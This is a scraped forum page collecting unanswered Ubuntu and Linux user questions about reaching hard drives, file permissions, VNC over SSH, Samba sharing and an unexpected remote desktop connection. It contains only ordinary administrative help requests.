Ubuntu Security :: Access Remote Hard Drive From Another Computer

What I want to do is pull data from any of the hard drives attached to my Linux box from my Windows machine. I have been moving small amounts of data from the drives to my OS drive and those parts share easily, but I want to move away from that method to move large amounts of data at the same time.I have tried using Samba as it is used for file sharing between systems and that I have to give my Windows box permission through Samba.
Trick is, I'm not sure where to start, though I have an idea and wanted to know if this is the right track before I start editing my file system.
My macbook pro stopped booting yesterday due to some file system corruption in the hard drive. I am able to access this drive through a linux live cd which I am using now but when I go to some folders it says "Could not enter folder /media/Macintosh HD/..." My question is how do I give myself the permissions to be able to access these files and transfer them to a network drive?
I want to access my hard drive to copy over my old documents. So I boot into a LiveUSB, mount my ubuntu partition, and then cd to my home directory, but I can't open it. I get "permission denied." I encrypted my whole home directory and know the password, but how do I "decrypt" it or login as the partition's root so I can access the documents that way. I'm booted into the USB, but can't access the home directory. I get "You do not have the permissions necessary to view the contents of 'jake'".
My home network consists of two computers that share one internet connection via a router. I have a desktop computer that runs Ubuntu (Karmic), connected via ethernet; and a netbook that runs Windows 7 (will be Ubuntu, eventually), which connects wirelessly. Both computers have multiple user accounts. What I would like to do is access my account on the Ubuntu desktop via the netbook while my wife is using the desktop with her account (or enable her to access her account on the desktop while I am using it). I looked into VNC, but it, apparently, only supports the active desktop. So, if someone connected to the computer while it was in use, they would be looking at the other user's desktop. Is this a misconception on my part?
So, I have 3 questions: -From the netbook, how can I log into my account on the desktop and just get a command-line shell? - From the netbook, how can I log into my account on the desktop and actually have access to my Gnome desktop? - If I leave my house with the netbook, and want to log into my desktop machine across the internet (CLI and/or Gnome), how can I do that?
I have windows XP and Ubuntu 10.10 installed on the same computer. I want to remote access windows xp from Ubuntu. I have tried remote desktop viewer, terminal server client and tight VNC but nothing works.
I'm trying to access a remote computer by tunnelling VNC through ssh. I've used VNC for years, but never through ssh. Both computers are running Fedora 14, installed by me. Doing a general Internet search, I found three articles, and they all had basically the same instructions. However, they don't seem to work. Here's what I did. Call my local computer "computer A," and the remote computer "computer B." I installed vncserver on B using yum:
(1) yum install tigervnc-server (2) Then on B I started the server:
vncserver The first time you do this, you're asked to set up a password. Everything else was automatic. I did nothing to /etc/sysconfig/vncservers.
(3) With vncserver running on B, on A I issued the following command:
ssh -L 5901:localhost:5901 username-on-B@IP-address-for-B After giving the password, this logged me into a terminal session on B.
(4) At that prompt on B, I issued this command:
vncviewer localhost:1 According to the tutorials I found, this is the last step. The desktop window on B should open. It does not work. The following error was given: vncviewer: unable to open display "" What am I doing wrong? How does one tunnel VNC through ssh?
The tutorial (UNIX Tutorial) does not say anything about the license from a remote computer, I want to be able to save files in these folders of mine, but can not access from a remote computer. Normally the command would win R (Windows key and R) give me a sign up picture, it comes up but I can not access. The message that comes up is that the network path is not available.
i have just recently purchased a SeaGate 1TB External Hardrive. i have very sensitive information on this storage unit that i only want certain people to have access to. is there any way of password protecting the hardrive? preferably using linux or what are my options?
I'm new to the principle of network boot and I was wondering if this is possible. Computer A runs openSUSE. Computer B is an older, slower computer. Computer A and computer B are connected using an Ethernet cable that supports two-way transport. Can I use network boot on computer B to use the OS on computer A remotely while computer A is being used too? Does it involve RDP? Will the remote user experience noticeable lags/delays? What do I need to install on computer A to make this happen?
My linux PC is connected at work and I was able to configure the IP to connect to the network. I need a way to access the linux computer from other windows PC in the office via shared folders and or remote desktop. I am stumbling upon "VNC" on google.

I want to load ubuntu on my home pc. I have two hard drives but not have enough dvd's to back everything up on #2 hard drive. If I load ubuntu on drive 1 can I get in two drive two?
we usually have to access a batch of computers that is located on campus. This is straightforward enough on Windows, the OS that the computer support center cares about, but I'm interested to see how I would handle this in Debian. The process for Windows is:
1) Run the authentication program, which runs in the background. 2) Use Exceed on Demand (or Putty, but I can't really use that for my classes ), and log into the server. From there, it lets you log in to whatever computer you want. When logging on with Exceed on Demand, Solaris environment is then launched.
Now, I know there's not a lot of technical information here, and I apologize, but I know next to nothing about networking. What I do know is that I'm remotely accessing a secure computer, and then I ssh over to another computer (when using Putty, which was only command-line). I was wondering how easy or hard this would be to do through Debian, including the fact that I need to have the authentication program running.

I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
So I tried to install Ubuntu on my Acer Aspire ASE380 desktop, and I think during the partition portion. I think I messed up the hard drive.
Now my computer won't recognize my hard drive. I've tried using the acer repair disks I made, I tried unplugging and checking all the cords and lines, I tired flashing the BIOS, I've tried using other boot disks like Ultimate boot CD, and Acer support is no help either.
I really don't know what to do now. It shows nothing in the boot setup or the BIOS set up. I've also tired the ALT - F10 for acer computers to enter and repair partition and nothing.
I just want to get this thing up and running. I'm tempted to just buy a new hard drive.
My friend gave me his old computer but he kept the hard drive, I have a computer with a 200 gb hard drive. could I partition the hard drive and have the computer my friend gave me access the other partition without having to take the hard drive out and connect it to the other computer?
I setup a remote web server yesterday evening, which had Centos 5.3 on it. This went well, and I did this mostly over vnc, to get a GUI. However, I hadn't realised that there was a pending cron job to 'yum upgrade'. So, come 2am, 5.3 turned into 5.6. I carried on the install today, but after some time (I'm not sure exactly how or when), I lost the ability to run any GUI system config tools that required root login. I also lost the ability to run anything graphical - emacs, for example, when I was already root in an xterm.
/var/log/secure isn't telling me anything. It claims that it's running the config tool on my behalf, but nothing happens. If I try to run emacs, I get a message saying that the X server isn't responding. Could this be related to the upgrade? It feels like a PolicyKit problem - I've seen something similar on 6.0 for remote access over vnc - but 5.6 isn't running PolicyKIt.
I have 2 computers, one running ubuntu 9.10 Karmic and the other runs Windows 7.
I have several sata hard drives that I keep files on. They are all formatted ext3. I have a blacx sata to usb dock on my ubuntu computer that I use to go through files and back up and such. I have a usb to sata dock on the windows 7 machine.
When I plug in the hard drive Windows says that it has to be formatted and the drive is "raw"
I can check the drive in ubuntu and everything is right
I tried installing ext2fsd and it sees the drive but wont let me select any file type or mount it. I think because its going through the usb port.
So how can I make windows 7 see and be able to access an ext3 formatted drive thats plugged into the usb port?
I have posted in regards to fixing some problems I had after running recoverjpeg, and most are fixed. However, this process (recoverjpeg) continues to find pictures and dump them into my hard drive. I am fighting an uphill battle. Is there a way to stop a program from running continuously? I removed the package, but it continues to find files on my computer and put them into my hard drive, which is a problem.
In my system i have 3 250 GB Hard drives in a RAID 5 configuration. unfortunately, i cannot see this volume in "Computer", so i am unable to access any of the files on the volume. wierd thing is that when i enter disk utility, it finds the drives, and recognises them as a RAID volume. any ideas on how i can access the files on this drive
I got a problem with the motherboard of my computer and now I need to get some files out from the hard drive (an ext3 partition). I can access the files from another computer but because of the permissions of my user it doesn't let me copy the files over to another drive.
my computer was running Kubuntu 8.10 with a Vista dualboot. I also tried attaching the hard drive to another laptop, but because of the video drivers the display doesn't function properly.
I'm using a fingerprint reader on my laptop, works pretty well:

Like I said, it works nicely... until I try to SSH in and sudo something remotely, when it will ask me kindly to swipe my finger over the reader that's attached to the laptop which is on my desk at home thirty kilometres away. Naturally there's no method built into pam_fprint to abort via a keypress.
So, is there any way to tell PAM to only use certain modules if I'm in a locally logged in session?
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
I want to make my own raid array, that is essentially identical to one of those commercially available external raid drives.The only thing is, I want to do this by using a dedicated computer as the drive, and connecting it to another computer to use as the server. Is there some way to do this. Maybe make a sata port on the raid computer appear lixe a hard drive to the server. Or use a usb 'crossover' cable to connect the 2.Is this even possible, or should I just use the raid computer as the file server too?
in windows 7 we can see the free space on each drive from my computer,but i am not able to see the free space on a drive from computer window in ubuntu 10.04
I have a dell inspiron 9300. I have Ubuntu 10.04 LTS.on't have the root password.Something I'd like to do would be to have two separate ubuntu's on my computer. I'd like to keep this one just as it is but also have another ubuntu-same version- that I can boot up into, and have it default booting up into the old one. How exactly do I do this? I know very little about computers. I barely mastered registration for this site, and copy/paste is a rather new skill for me.
